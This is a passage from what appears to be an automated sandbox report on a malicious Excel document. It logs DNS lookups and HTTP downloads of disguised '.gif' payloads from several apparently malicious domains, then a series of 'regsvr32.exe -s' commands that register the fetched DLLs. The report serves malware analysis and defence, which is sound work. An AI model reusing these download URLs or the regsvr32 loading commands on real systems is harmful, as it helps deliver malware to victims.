                                                                                                                                                    Apr 6, 2021 09:55:17.000957012 CEST4973680192.168.2.4103.205.143.227
                                                                                                                                                    Apr 6, 2021 09:55:17.001710892 CEST4973680192.168.2.4103.205.143.227
                                                                                                                                                    Apr 6, 2021 09:55:17.199371099 CEST8049736103.205.143.227192.168.2.4
                                                                                                                                                    Apr 6, 2021 09:55:17.751396894 CEST8049736103.205.143.227192.168.2.4
                                                                                                                                                    Apr 6, 2021 09:55:17.751528978 CEST4973680192.168.2.4103.205.143.227
                                                                                                                                                    Apr 6, 2021 09:55:28.210486889 CEST8049736103.205.143.227192.168.2.4
                                                                                                                                                    Apr 6, 2021 09:55:28.210563898 CEST4973680192.168.2.4103.205.143.227
                                                                                                                                                    Apr 6, 2021 09:56:59.966986895 CEST4973680192.168.2.4103.205.143.227
                                                                                                                                                    Apr 6, 2021 09:57:00.497221947 CEST4973680192.168.2.4103.205.143.227
                                                                                                                                                    Apr 6, 2021 09:57:01.481533051 CEST4973680192.168.2.4103.205.143.227
                                                                                                                                                    Apr 6, 2021 09:57:03.451226950 CEST4973680192.168.2.4103.205.143.227
                                                                                                                                                    Apr 6, 2021 09:57:07.372733116 CEST4973680192.168.2.4103.205.143.227
                                                                                                                                                    Apr 6, 2021 09:57:15.201550961 CEST4973680192.168.2.4103.205.143.227

                                                                                                                                                    UDP Packets

                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                    Apr 6, 2021 09:54:56.057313919 CEST5372353192.168.2.48.8.8.8
                                                                                                                                                    Apr 6, 2021 09:54:56.106487036 CEST53537238.8.8.8192.168.2.4
                                                                                                                                                    Apr 6, 2021 09:54:56.439960003 CEST6464653192.168.2.48.8.8.8
                                                                                                                                                    Apr 6, 2021 09:54:56.491002083 CEST53646468.8.8.8192.168.2.4
                                                                                                                                                    Apr 6, 2021 09:54:56.700411081 CEST6529853192.168.2.48.8.8.8
                                                                                                                                                    Apr 6, 2021 09:54:56.749491930 CEST53652988.8.8.8192.168.2.4
                                                                                                                                                    Apr 6, 2021 09:54:57.424484968 CEST5912353192.168.2.48.8.8.8
                                                                                                                                                    Apr 6, 2021 09:54:57.472316980 CEST53591238.8.8.8192.168.2.4
                                                                                                                                                    Apr 6, 2021 09:54:59.781480074 CEST5453153192.168.2.48.8.8.8
                                                                                                                                                    Apr 6, 2021 09:54:59.830004930 CEST53545318.8.8.8192.168.2.4
                                                                                                                                                    Apr 6, 2021 09:55:00.887706995 CEST4971453192.168.2.48.8.8.8
                                                                                                                                                    Apr 6, 2021 09:55:00.935883045 CEST53497148.8.8.8192.168.2.4
                                                                                                                                                    Apr 6, 2021 09:55:01.828459024 CEST5802853192.168.2.48.8.8.8
                                                                                                                                                    Apr 6, 2021 09:55:01.874355078 CEST53580288.8.8.8192.168.2.4
                                                                                                                                                    Apr 6, 2021 09:55:02.233068943 CEST5309753192.168.2.48.8.8.8
                                                                                                                                                    Apr 6, 2021 09:55:02.294461966 CEST53530978.8.8.8192.168.2.4
                                                                                                                                                    Apr 6, 2021 09:55:08.799714088 CEST4925753192.168.2.48.8.8.8
                                                                                                                                                    Apr 6, 2021 09:55:08.845710039 CEST53492578.8.8.8192.168.2.4
                                                                                                                                                    Apr 6, 2021 09:55:10.006622076 CEST6238953192.168.2.48.8.8.8
                                                                                                                                                    Apr 6, 2021 09:55:10.085582972 CEST53623898.8.8.8192.168.2.4
                                                                                                                                                    Apr 6, 2021 09:55:10.422192097 CEST4991053192.168.2.48.8.8.8
                                                                                                                                                    Apr 6, 2021 09:55:10.468363047 CEST53499108.8.8.8192.168.2.4
                                                                                                                                                    Apr 6, 2021 09:55:10.521728039 CEST5585453192.168.2.48.8.8.8
                                                                                                                                                    Apr 6, 2021 09:55:10.576072931 CEST53558548.8.8.8192.168.2.4
                                                                                                                                                    Apr 6, 2021 09:55:11.520768881 CEST5585453192.168.2.48.8.8.8
                                                                                                                                                    Apr 6, 2021 09:55:11.575422049 CEST53558548.8.8.8192.168.2.4
                                                                                                                                                    Apr 6, 2021 09:55:12.535201073 CEST5585453192.168.2.48.8.8.8
                                                                                                                                                    Apr 6, 2021 09:55:12.602499008 CEST53558548.8.8.8192.168.2.4
                                                                                                                                                    Apr 6, 2021 09:55:14.374536037 CEST6454953192.168.2.48.8.8.8
                                                                                                                                                    Apr 6, 2021 09:55:14.428766012 CEST53645498.8.8.8192.168.2.4
                                                                                                                                                    Apr 6, 2021 09:55:14.491508961 CEST6315353192.168.2.48.8.8.8
                                                                                                                                                    Apr 6, 2021 09:55:14.537358046 CEST53631538.8.8.8192.168.2.4
                                                                                                                                                    Apr 6, 2021 09:55:14.551110029 CEST5585453192.168.2.48.8.8.8
                                                                                                                                                    Apr 6, 2021 09:55:14.597151995 CEST53558548.8.8.8192.168.2.4
                                                                                                                                                    Apr 6, 2021 09:55:14.904489994 CEST5299153192.168.2.48.8.8.8
                                                                                                                                                    Apr 6, 2021 09:55:14.962584019 CEST53529918.8.8.8192.168.2.4
                                                                                                                                                    Apr 6, 2021 09:55:15.422574997 CEST5370053192.168.2.48.8.8.8
                                                                                                                                                    Apr 6, 2021 09:55:15.711530924 CEST5172653192.168.2.48.8.8.8
                                                                                                                                                    Apr 6, 2021 09:55:15.757831097 CEST53517268.8.8.8192.168.2.4
                                                                                                                                                    Apr 6, 2021 09:55:15.776949883 CEST53537008.8.8.8192.168.2.4
                                                                                                                                                    Apr 6, 2021 09:55:16.259332895 CEST5679453192.168.2.48.8.8.8
                                                                                                                                                    Apr 6, 2021 09:55:16.313508987 CEST53567948.8.8.8192.168.2.4
                                                                                                                                                    Apr 6, 2021 09:55:16.741473913 CEST5653453192.168.2.48.8.8.8
                                                                                                                                                    Apr 6, 2021 09:55:16.798671007 CEST53565348.8.8.8192.168.2.4
                                                                                                                                                    Apr 6, 2021 09:55:18.567047119 CEST5585453192.168.2.48.8.8.8
                                                                                                                                                    Apr 6, 2021 09:55:18.623831987 CEST53558548.8.8.8192.168.2.4
                                                                                                                                                    Apr 6, 2021 09:55:29.809089899 CEST5662753192.168.2.48.8.8.8
                                                                                                                                                    Apr 6, 2021 09:55:29.856167078 CEST53566278.8.8.8192.168.2.4
                                                                                                                                                    Apr 6, 2021 09:55:34.174314022 CEST5662153192.168.2.48.8.8.8
                                                                                                                                                    Apr 6, 2021 09:55:34.233164072 CEST53566218.8.8.8192.168.2.4
                                                                                                                                                    Apr 6, 2021 09:55:47.339354992 CEST6311653192.168.2.48.8.8.8
                                                                                                                                                    Apr 6, 2021 09:55:47.385590076 CEST53631168.8.8.8192.168.2.4
                                                                                                                                                    Apr 6, 2021 09:55:48.231545925 CEST6407853192.168.2.48.8.8.8
                                                                                                                                                    Apr 6, 2021 09:55:48.286077976 CEST53640788.8.8.8192.168.2.4
                                                                                                                                                    Apr 6, 2021 09:55:51.891438007 CEST6480153192.168.2.48.8.8.8
                                                                                                                                                    Apr 6, 2021 09:55:51.937288046 CEST53648018.8.8.8192.168.2.4
                                                                                                                                                    Apr 6, 2021 09:56:06.653248072 CEST6172153192.168.2.48.8.8.8
                                                                                                                                                    Apr 6, 2021 09:56:06.699546099 CEST53617218.8.8.8192.168.2.4
                                                                                                                                                    Apr 6, 2021 09:56:09.238087893 CEST5125553192.168.2.48.8.8.8
                                                                                                                                                    Apr 6, 2021 09:56:09.293976068 CEST53512558.8.8.8192.168.2.4
                                                                                                                                                    Apr 6, 2021 09:56:19.386142969 CEST6152253192.168.2.48.8.8.8
                                                                                                                                                    Apr 6, 2021 09:56:19.432065964 CEST53615228.8.8.8192.168.2.4
                                                                                                                                                    Apr 6, 2021 09:56:20.399442911 CEST5233753192.168.2.48.8.8.8
                                                                                                                                                    Apr 6, 2021 09:56:20.449572086 CEST53523378.8.8.8192.168.2.4
                                                                                                                                                    Apr 6, 2021 09:56:44.248491049 CEST5504653192.168.2.48.8.8.8
                                                                                                                                                    Apr 6, 2021 09:56:44.382529974 CEST53550468.8.8.8192.168.2.4
                                                                                                                                                    Apr 6, 2021 09:56:45.783363104 CEST4961253192.168.2.48.8.8.8
                                                                                                                                                    Apr 6, 2021 09:56:45.913228989 CEST53496128.8.8.8192.168.2.4
                                                                                                                                                    Apr 6, 2021 09:56:46.552134991 CEST4928553192.168.2.48.8.8.8
                                                                                                                                                    Apr 6, 2021 09:56:46.609467983 CEST53492858.8.8.8192.168.2.4
                                                                                                                                                    Apr 6, 2021 09:56:47.093302965 CEST5060153192.168.2.48.8.8.8
                                                                                                                                                    Apr 6, 2021 09:56:47.155508995 CEST53506018.8.8.8192.168.2.4
                                                                                                                                                    Apr 6, 2021 09:56:47.921578884 CEST6087553192.168.2.48.8.8.8
                                                                                                                                                    Apr 6, 2021 09:56:47.975783110 CEST53608758.8.8.8192.168.2.4
                                                                                                                                                    Apr 6, 2021 09:56:48.615324020 CEST5644853192.168.2.48.8.8.8
                                                                                                                                                    Apr 6, 2021 09:56:48.672681093 CEST53564488.8.8.8192.168.2.4
                                                                                                                                                    Apr 6, 2021 09:56:49.461865902 CEST5917253192.168.2.48.8.8.8
                                                                                                                                                    Apr 6, 2021 09:56:49.516123056 CEST53591728.8.8.8192.168.2.4
                                                                                                                                                    Apr 6, 2021 09:56:50.241547108 CEST6242053192.168.2.48.8.8.8
                                                                                                                                                    Apr 6, 2021 09:56:50.290854931 CEST53624208.8.8.8192.168.2.4
                                                                                                                                                    Apr 6, 2021 09:56:50.532402992 CEST6057953192.168.2.48.8.8.8
                                                                                                                                                    Apr 6, 2021 09:56:50.587022066 CEST53605798.8.8.8192.168.2.4
                                                                                                                                                    Apr 6, 2021 09:56:51.271948099 CEST5018353192.168.2.48.8.8.8
                                                                                                                                                    Apr 6, 2021 09:56:51.321423054 CEST53501838.8.8.8192.168.2.4
                                                                                                                                                    Apr 6, 2021 09:56:52.329005003 CEST6153153192.168.2.48.8.8.8
                                                                                                                                                    Apr 6, 2021 09:56:52.386246920 CEST53615318.8.8.8192.168.2.4
                                                                                                                                                    Apr 6, 2021 09:56:54.988344908 CEST4922853192.168.2.48.8.8.8
                                                                                                                                                    Apr 6, 2021 09:56:55.035957098 CEST53492288.8.8.8192.168.2.4
                                                                                                                                                    Apr 6, 2021 09:56:55.196751118 CEST5979453192.168.2.48.8.8.8
                                                                                                                                                    Apr 6, 2021 09:56:55.251498938 CEST53597948.8.8.8192.168.2.4
                                                                                                                                                    Apr 6, 2021 09:56:55.959295034 CEST5591653192.168.2.48.8.8.8
                                                                                                                                                    Apr 6, 2021 09:56:56.036698103 CEST53559168.8.8.8192.168.2.4
                                                                                                                                                    Apr 6, 2021 09:56:56.070770025 CEST5275253192.168.2.48.8.8.8
                                                                                                                                                    Apr 6, 2021 09:56:56.117073059 CEST53527528.8.8.8192.168.2.4
                                                                                                                                                    Apr 6, 2021 09:56:56.252897024 CEST6054253192.168.2.48.8.8.8
                                                                                                                                                    Apr 6, 2021 09:56:56.320879936 CEST53605428.8.8.8192.168.2.4
                                                                                                                                                    Apr 6, 2021 09:56:57.476695061 CEST6068953192.168.2.48.8.8.8
                                                                                                                                                    Apr 6, 2021 09:56:57.522500038 CEST53606898.8.8.8192.168.2.4
                                                                                                                                                    Apr 6, 2021 09:56:58.360049009 CEST6420653192.168.2.48.8.8.8
                                                                                                                                                    Apr 6, 2021 09:56:58.406126022 CEST53642068.8.8.8192.168.2.4
                                                                                                                                                    Apr 6, 2021 09:57:22.603830099 CEST5090453192.168.2.48.8.8.8
                                                                                                                                                    Apr 6, 2021 09:57:22.650999069 CEST53509048.8.8.8192.168.2.4

                                                                                                                                                    DNS Queries

                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                    Apr 6, 2021 09:55:14.374536037 CEST192.168.2.48.8.8.80x76ccStandard query (0)velma-harber30ku.comA (IP address)IN (0x0001)
                                                                                                                                                    Apr 6, 2021 09:55:14.904489994 CEST192.168.2.48.8.8.80x9c5dStandard query (0)laura9630fr.comA (IP address)IN (0x0001)
                                                                                                                                                    Apr 6, 2021 09:55:15.422574997 CEST192.168.2.48.8.8.80xa84aStandard query (0)mills-skyla30ec.comA (IP address)IN (0x0001)
                                                                                                                                                    Apr 6, 2021 09:55:16.259332895 CEST192.168.2.48.8.8.80x69f1Standard query (0)moumitas.comA (IP address)IN (0x0001)
                                                                                                                                                    Apr 6, 2021 09:55:16.741473913 CEST192.168.2.48.8.8.80x23b9Standard query (0)jacktech.jackindia.comA (IP address)IN (0x0001)

                                                                                                                                                    DNS Answers

                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                    Apr 6, 2021 09:55:14.428766012 CEST8.8.8.8192.168.2.40x76ccNo error (0)velma-harber30ku.com8.211.4.209A (IP address)IN (0x0001)
                                                                                                                                                    Apr 6, 2021 09:55:14.962584019 CEST8.8.8.8192.168.2.40x9c5dNo error (0)laura9630fr.com8.211.4.209A (IP address)IN (0x0001)
                                                                                                                                                    Apr 6, 2021 09:55:15.776949883 CEST8.8.8.8192.168.2.40xa84aNo error (0)mills-skyla30ec.com8.211.4.209A (IP address)IN (0x0001)
                                                                                                                                                    Apr 6, 2021 09:55:16.313508987 CEST8.8.8.8192.168.2.40x69f1No error (0)moumitas.com74.208.236.90A (IP address)IN (0x0001)
                                                                                                                                                    Apr 6, 2021 09:55:16.798671007 CEST8.8.8.8192.168.2.40x23b9No error (0)jacktech.jackindia.com103.205.143.227A (IP address)IN (0x0001)

                                                                                                                                                    HTTP Request Dependency Graph

                                                                                                                                                    • velma-harber30ku.com
                                                                                                                                                    • laura9630fr.com
                                                                                                                                                    • mills-skyla30ec.com
                                                                                                                                                    • moumitas.com
                                                                                                                                                    • jacktech.jackindia.com

                                                                                                                                                    HTTP Packets

                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    0192.168.2.4497308.211.4.20980C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Apr 6, 2021 09:55:14.470207930 CEST1496OUTGET /gg.gif HTTP/1.1
                                                                                                                                                    Accept: */*
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                    Host: velma-harber30ku.com
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Apr 6, 2021 09:55:14.891041040 CEST1584INHTTP/1.1 503 Service Unavailable
                                                                                                                                                    Date: Tue, 06 Apr 2021 07:55:14 GMT
                                                                                                                                                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                                                    Content-Length: 74
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Data Raw: 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 2e 3c 2f 68 31 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 67 67 2e 67 69 66 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e
                                                                                                                                                    Data Ascii: <h1>Not Found.</h1>The requested URL /gg.gif was not found on this server.


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    1192.168.2.4497328.211.4.20980C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Apr 6, 2021 09:55:15.004120111 CEST1590OUTGET /gg.gif HTTP/1.1
                                                                                                                                                    Accept: */*
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                    Host: laura9630fr.com
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Apr 6, 2021 09:55:15.408405066 CEST1654INHTTP/1.1 503 Service Unavailable
                                                                                                                                                    Date: Tue, 06 Apr 2021 07:55:15 GMT
                                                                                                                                                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                                                    Content-Length: 74
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Data Raw: 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 2e 3c 2f 68 31 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 67 67 2e 67 69 66 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e
                                                                                                                                                    Data Ascii: <h1>Not Found.</h1>The requested URL /gg.gif was not found on this server.


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    2192.168.2.4497348.211.4.20980C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Apr 6, 2021 09:55:15.818351984 CEST1764OUTGET /gg.gif HTTP/1.1
                                                                                                                                                    Accept: */*
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                    Host: mills-skyla30ec.com
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Apr 6, 2021 09:55:16.223596096 CEST1870INHTTP/1.1 503 Service Unavailable
                                                                                                                                                    Date: Tue, 06 Apr 2021 07:55:15 GMT
                                                                                                                                                    Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                                                    Content-Length: 74
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Data Raw: 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 2e 3c 2f 68 31 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 67 67 2e 67 69 66 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e
                                                                                                                                                    Data Ascii: <h1>Not Found.</h1>The requested URL /gg.gif was not found on this server.


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    3192.168.2.44973574.208.236.9080C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Apr 6, 2021 09:55:16.477008104 CEST1874OUTGET /ds/0204.gif HTTP/1.1
                                                                                                                                                    Accept: */*
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                    Host: moumitas.com
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Apr 6, 2021 09:55:16.725126028 CEST1991INHTTP/1.1 503 Service Unavailable
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    Keep-Alive: timeout=15
                                                                                                                                                    Date: Tue, 06 Apr 2021 07:55:16 GMT
                                                                                                                                                    Server: Apache
                                                                                                                                                    X-Powered-By: PHP/7.3.27
                                                                                                                                                    Data Raw: 34 66 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 2e 3c 2f 68 31 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 64 73 2f 30 32 30 34 2e 67 69 66 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0d 0a
                                                                                                                                                    Data Ascii: 4f<h1>Not Found.</h1>The requested URL /ds/0204.gif was not found on this server.
                                                                                                                                                    Apr 6, 2021 09:55:16.730202913 CEST1994INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 0


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    4192.168.2.449736103.205.143.22780C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Apr 6, 2021 09:55:17.001710892 CEST2075OUTGET /ds/0204.gif HTTP/1.1
                                                                                                                                                    Accept: */*
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                    Host: jacktech.jackindia.com
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Apr 6, 2021 09:55:17.751396894 CEST2409INHTTP/1.1 503 Service Unavailable
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Content-Length: 97
                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                    Date: Tue, 06 Apr 2021 07:55:16 GMT
                                                                                                                                                    Server: LiteSpeed
                                                                                                                                                    Data Raw: 1f 8b 08 00 00 00 00 00 00 03 b3 c9 30 b4 f3 cb 2f 51 70 cb 2f cd 4b d1 b3 d1 cf 30 b4 0b c9 48 55 28 4a 2d 2c 4d 2d 2e 49 4d 51 08 0d f2 51 d0 4f 29 d6 37 30 32 30 d1 4b cf 4c 53 28 4f 2c 56 c8 cb 2f 51 48 03 e9 50 c8 cf 53 28 c9 c8 2c 56 28 4e 2d 2a 4b 2d d2 03 00 b3 0a 0e ff 4f 00 00 00
                                                                                                                                                    Data Ascii: 0/Qp/K0HU(J-,M-.IMQQO)7020KLS(O,V/QHPS(,V(N-*K-O


                                                                                                                                                    Code Manipulations

                                                                                                                                                    Statistics

                                                                                                                                                    CPU Usage

                                                                                                                                                    Click to jump to process

                                                                                                                                                    Memory Usage

                                                                                                                                                    Click to jump to process

                                                                                                                                                    High Level Behavior Distribution

                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                    Behavior

                                                                                                                                                    Click to jump to process

                                                                                                                                                    System Behavior

                                                                                                                                                    General

                                                                                                                                                    Start time:09:55:08
                                                                                                                                                    Start date:06/04/2021
                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                    Imagebase:0x60000
                                                                                                                                                    File size:27110184 bytes
                                                                                                                                                    MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    General

                                                                                                                                                    Start time:09:55:17
                                                                                                                                                    Start date:06/04/2021
                                                                                                                                                    Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:regsvr32.exe -s ..\nvcoerf.dll
                                                                                                                                                    Imagebase:0x1160000
                                                                                                                                                    File size:20992 bytes
                                                                                                                                                    MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    General

                                                                                                                                                    Start time:09:55:18
                                                                                                                                                    Start date:06/04/2021
                                                                                                                                                    Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:regsvr32.exe -s ..\nvcoerf1.dll
                                                                                                                                                    Imagebase:0x1160000
                                                                                                                                                    File size:20992 bytes
                                                                                                                                                    MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    General

                                                                                                                                                    Start time:09:55:18
                                                                                                                                                    Start date:06/04/2021
                                                                                                                                                    Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:regsvr32.exe -s ..\nvcoerf2.dll
                                                                                                                                                    Imagebase:0x1160000
                                                                                                                                                    File size:20992 bytes
                                                                                                                                                    MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    General

                                                                                                                                                    Start time:09:55:19
                                                                                                                                                    Start date:06/04/2021
                                                                                                                                                    Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:regsvr32.exe -s ..\nvcoerf3.dll
                                                                                                                                                    Imagebase:0x1160000
                                                                                                                                                    File size:20992 bytes
                                                                                                                                                    MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    General

                                                                                                                                                    Start time:09:55:21
                                                                                                                                                    Start date:06/04/2021
                                                                                                                                                    Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:regsvr32.exe -s ..\nvcoerf4.dll
                                                                                                                                                    Imagebase:0x1160000
                                                                                                                                                    File size:20992 bytes
                                                                                                                                                    MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    Disassembly

                                                                                                                                                    Code Analysis

                                                                                                                                                    Reset < >